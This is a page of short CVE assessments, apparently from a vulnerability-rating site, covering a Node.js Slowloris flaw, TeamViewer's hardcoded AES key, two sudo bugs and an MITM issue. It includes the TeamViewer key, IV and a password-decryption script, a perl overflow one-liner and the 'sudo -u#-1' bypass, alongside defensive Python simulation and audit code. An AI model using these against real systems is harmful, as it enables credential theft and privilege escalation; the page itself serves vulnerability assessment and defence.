SherlockSec (18)
Last Login: April 15, 2020
SherlockSec's Latest (5) Contributions
Technical Analysis
This is a Denial of Service CVE, but with a twist. Normally, denial of service attacks consist of flooding a server with enough traffic so that it ceases to operate. This CVE is different, as it is a Slowloris DoS. Slowloris DoS attacks hang a server by opening as many threads as possible before waiting the max amount of time that they can before sending data. When they finally send data, they send as small of an amount of data as the server will allow. This keeps all the threads open for as long as possible, meaning no new connections can be opened, thus causing a denial of service. For a more detailed explanation of a Slowloris attack, please see the following video: https://www.youtube.com/watch?v=XiFkyR35v2Y .
This particular CVE affects all versions of Node.JS prior to 6.15.0, 8.14.0, 10.14.0 and 11.3.0. Node patched this by applying a 40 second timeout to servers receiving HTTP headers, which can be customized. As a patch has been released, please patch accordingly.
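The point of the Node fix is that the timeout is a deadline on receiving the complete header block, measured from the first byte, not an idle timeout that resets on every chunk. An idle timeout is exactly what a Slowloris client defeats by trickling one byte at a time. The following is an added illustration in Python, not code from this assessment or from Node.js: two toy policies (`HeaderDeadline`, modelled on the 40 second headers timeout, and `IdleTimeout`, the per-chunk variant) are driven with a constructed trickle schedule so the difference is visible. Class and function names are assumptions for the example.

```python
from typing import List, Optional, Tuple

HEADER_END = b"\r\n\r\n"   # end of the HTTP header block


class HeaderDeadline:
    """Deadline policy: the complete header block must arrive within
    headers_timeout seconds of the first byte (the Node.js approach)."""

    def __init__(self, headers_timeout: float = 40.0, max_header_bytes: int = 16384):
        self.headers_timeout = headers_timeout
        self.max_header_bytes = max_header_bytes
        self.started_at: Optional[float] = None
        self.buf = bytearray()

    def feed(self, chunk: bytes, now: float) -> str:
        """Return 'complete', 'waiting', 'timeout' or 'too-large'. `now` is a monotonic clock."""
        if self.started_at is None:
            self.started_at = now
        if now - self.started_at > self.headers_timeout:
            return "timeout"          # deadline is absolute: trickling bytes does not extend it
        self.buf += chunk
        if len(self.buf) > self.max_header_bytes:
            return "too-large"
        return "complete" if HEADER_END in self.buf else "waiting"


class IdleTimeout:
    """Idle policy: give up only when the gap between two chunks exceeds `idle` seconds.
    Shown here because this is the policy Slowloris defeats."""

    def __init__(self, idle: float = 15.0):
        self.idle = idle
        self.last: Optional[float] = None
        self.buf = bytearray()

    def feed(self, chunk: bytes, now: float) -> str:
        if self.last is not None and now - self.last > self.idle:
            return "timeout"
        self.last = now               # every chunk, however small, resets the clock
        self.buf += chunk
        return "complete" if HEADER_END in self.buf else "waiting"


def simulate(policy, events: List[Tuple[float, bytes]]) -> str:
    """Drive a policy with (timestamp, chunk) events; return the first non-waiting verdict,
    or 'waiting' if the connection is still hanging when the schedule ends."""
    verdict = "waiting"
    for now, chunk in events:
        verdict = policy.feed(chunk, now)
        if verdict != "waiting":
            break
    return verdict


def trickle_events(interval: float, count: int) -> List[Tuple[float, bytes]]:
    """Constructed Slowloris-style schedule: a request line and one header, then a single
    byte every `interval` seconds, never sending the blank line that ends the headers."""
    events = [(0.0, b"GET / HTTP/1.1\r\nHost: example\r\nX-Pad: ")]
    for i in range(1, count + 1):
        events.append((i * interval, b"x"))
    return events


NORMAL_REQUEST = [(0.0, b"GET / HTTP/1.1\r\nHost: example\r\n\r\n")]

if __name__ == "__main__":
    slow = trickle_events(10.0, 6)    # one byte every 10 s for a minute
    print("idle 15s  :", simulate(IdleTimeout(15.0), slow))        # still waiting: never times out
    print("deadline  :", simulate(HeaderDeadline(40.0), slow))     # timeout at t=50
    print("normal    :", simulate(HeaderDeadline(40.0), NORMAL_REQUEST))
```

With a 10 second trickle the idle policy never fires, because no single gap exceeds 15 seconds, while the deadline policy closes the connection once the header phase has lasted longer than 40 seconds. A real server still needs a per-connection cap and a header size limit alongside the deadline; the `max_header_bytes` check stands in for the latter.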
Technical Analysis
In some versions of Teamviewer, user defined passwords are stored in the registry, encrypted with AES-128-CBC. This wouldn’t be an issue, if the key and IV for this AES encryption weren’t stored inside the Teamviewer binary itself. This means that we now have these:
key: 0602000000a400005253413100040000
iv: 0100010067244F436E6762F25EA8D704
This can be used to get the stored password using either the following python script (source: https://whynotsecurity.com/blog/teamviewer/) or using the MSF Module.
import hexdump, binascii
from Crypto.Cipher import AES   # pycryptodome

class AESCipher:
    def __init__(self, key):
        self.key = key

    def decrypt(self, iv, data):
        # AES-128-CBC with the key/IV recovered from the Teamviewer binary
        self.cipher = AES.new(self.key, AES.MODE_CBC, iv)
        return self.cipher.decrypt(data)

key = binascii.unhexlify("0602000000a400005253413100040000")
iv = binascii.unhexlify("0100010067244F436E6762F25EA8D704")
hex_str_cipher = "d690a9d0a592327f99bb4c6a6b6d4cbe"  # output from the registry
ciphertext = binascii.unhexlify(hex_str_cipher)

raw_un = AESCipher(key).decrypt(iv, ciphertext)
hexdump.hexdump(raw_un)                       # prints the hex dump itself (returns None)
password = raw_un.decode('utf-16').rstrip('\x00')  # stored as UTF-16, strip block padding
print(password)
This CVE requires users to reuse passwords across multiple accounts, so it’s not guaranteed to escalate privileges. This is also the reason why Teamviewer themselves state the following in their Security Bulletin:
In the blog post, the researcher mentions a privilege escalation risk. There’s no direct vulnerability offering someone the ability to gain additional privileges on the local system. The only risk would be in the case that a user is reusing the exposed passwords on other services.
Source – https://community.teamviewer.com/t5/Announcements/Specification-on-CVE-2019-18988/td-p/82264
Technical Analysis
This exploit is similar to CVE-2019-14287, in that it requires a specific config within /etc/sudoers. Present in sudo versions < 1.8.26, this vuln surrounds the pwfeedback option: an option that allows sudo to display asterisks when typing a sudo password. This module is susceptible to a buffer overflow attack, which was demonstrated in the following PoC:
$ perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
Password: Segmentation fault
Source – https://www.exploit-db.com/exploits/47995
An exploit for this vuln can be found here – https://github.com/saleemrashid/sudo-cve-2019-18634
A preconfigured test environment can be found here – https://tryhackme.com/room/sudovulnsbof
Technical Analysis
As many others before me have stated, this CVE holds very little use other than in CTF environments.
To spot this vuln, look for a configuration similar to this one in the /etc/sudoers file:
<user> ALL=(ALL:!root) NOPASSWD: ALL
If the sudo version is below 1.8.28, and the above configuration is present, you can exploit as follows:
sudo -u#-1 <command>
You can also use the unsigned equivalent of -1: 4294967295.
To test this bug in a preconfigured environment, check out https://tryhackme.com/room/sudovulnsbypass .
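Both sudo assessments above (the pwfeedback overflow, CVE-2019-18634, and the -u#-1 bypass, CVE-2019-14287) come down to the same two preconditions: a sudo version below the stated cut-off and a particular line in /etc/sudoers. The following is an added audit script in Python, not part of either assessment, that checks both from `sudo -V` output and sudoers text so a defender can confirm whether a host is exposed before relying on the TryHackMe rooms or the PoCs. The version thresholds are the ones stated above (1.8.26 and 1.8.28); the function names, the regexes and the sample sudoers file are assumptions constructed for the example.

```python
import re
from typing import List, Tuple

# Version cut-offs as stated in the two assessments above; verify them against
# your distribution's advisories, since backported fixes keep older version strings.
PWFEEDBACK_FIXED = (1, 8, 26, 0)   # CVE-2019-18634: pwfeedback buffer overflow
RUNAS_FIXED = (1, 8, 28, 0)        # CVE-2019-14287: -u#-1 / 4294967295 runas bypass

_VERSION_RE = re.compile(r"(\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(text: str) -> Tuple[int, int, int, int]:
    """Parse the first version in `sudo -V` output, e.g. '1.8.21p2' -> (1, 8, 21, 2)."""
    m = _VERSION_RE.search(text)
    if not m:
        raise ValueError("no sudo version found in: %r" % text)
    major, minor, patch, p = m.groups()
    return (int(major), int(minor), int(patch), int(p or 0))


def _logical_lines(sudoers: str):
    """Yield sudoers lines with '#' comments stripped and backslash continuations joined.
    (Simplification: '#include' directives and '#uid' specs are dropped too.)"""
    pending = ""
    for raw in sudoers.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            pending += line[:-1] + " "
            continue
        line = (pending + line).strip()
        pending = ""
        if line:
            yield line


def pwfeedback_enabled(sudoers: str) -> bool:
    """True if the Defaults lines leave pwfeedback on (a later '!pwfeedback' turns it off)."""
    enabled = False
    for line in _logical_lines(sudoers):
        head, _, rest = line.partition(" ")
        if not head.startswith("Defaults"):
            continue
        for opt in rest.replace(",", " ").split():
            if opt == "pwfeedback":
                enabled = True
            elif opt == "!pwfeedback":
                enabled = False
    return enabled


_RUNAS_RE = re.compile(r"\(([^)]*)\)")


def runas_excludes_root(sudoers: str) -> List[str]:
    """Return user-spec lines whose runas list has the (ALL:!root) / (ALL, !root) shape."""
    hits = []
    for line in _logical_lines(sudoers):
        head = line.split(None, 1)[0]
        if head.startswith(("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")):
            continue
        for runas in _RUNAS_RE.findall(line):
            parts = [p.strip() for p in re.split(r"[,:]", runas)]
            if "ALL" in parts and "!root" in parts:
                hits.append(line)
                break
    return hits


def audit(sudoers: str, sudo_version_output: str) -> List[str]:
    """Return the CVE ids whose version and configuration preconditions are both met."""
    version = parse_sudo_version(sudo_version_output)
    findings = []
    if version < PWFEEDBACK_FIXED and pwfeedback_enabled(sudoers):
        findings.append("CVE-2019-18634")
    if version < RUNAS_FIXED and runas_excludes_root(sudoers):
        findings.append("CVE-2019-14287")
    return findings


# Constructed sample input (not taken from a real host).
SAMPLE_SUDOERS = """\
Defaults env_reset, pwfeedback
root    ALL=(ALL:ALL) ALL
alice   ALL=(ALL:!root) NOPASSWD: ALL   # the shape called out above
%admin  ALL=(ALL) ALL
"""
SAMPLE_VERSION = "Sudo version 1.8.21p2\nSudoers policy plugin version 1.8.21p2\n"

if __name__ == "__main__":
    # On a live host: audit(open('/etc/sudoers').read(), subprocess.check_output(['sudo', '-V'], text=True))
    print(audit(SAMPLE_SUDOERS, SAMPLE_VERSION))   # ['CVE-2019-18634', 'CVE-2019-14287']
```

The version check is deliberately the weaker half of the audit: distributions backport fixes without bumping the upstream version string, so a hit here means "review the configuration and the package changelog", not "exploitable". Removing `pwfeedback` from Defaults and replacing `(ALL:!root)` style exclusions with an explicit runas list closes both findings regardless of version.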
Technical Analysis
There’s not a lot of information about this CVE, however the notice does give us some insight. This appears to me to be a simple Man-In-The-Middle attack: one that you’d be incredibly lucky to have a use for in the wild. As such, usability for this CVE is low. If more information comes forward regarding this CVE, I shall update my assessment accordingly.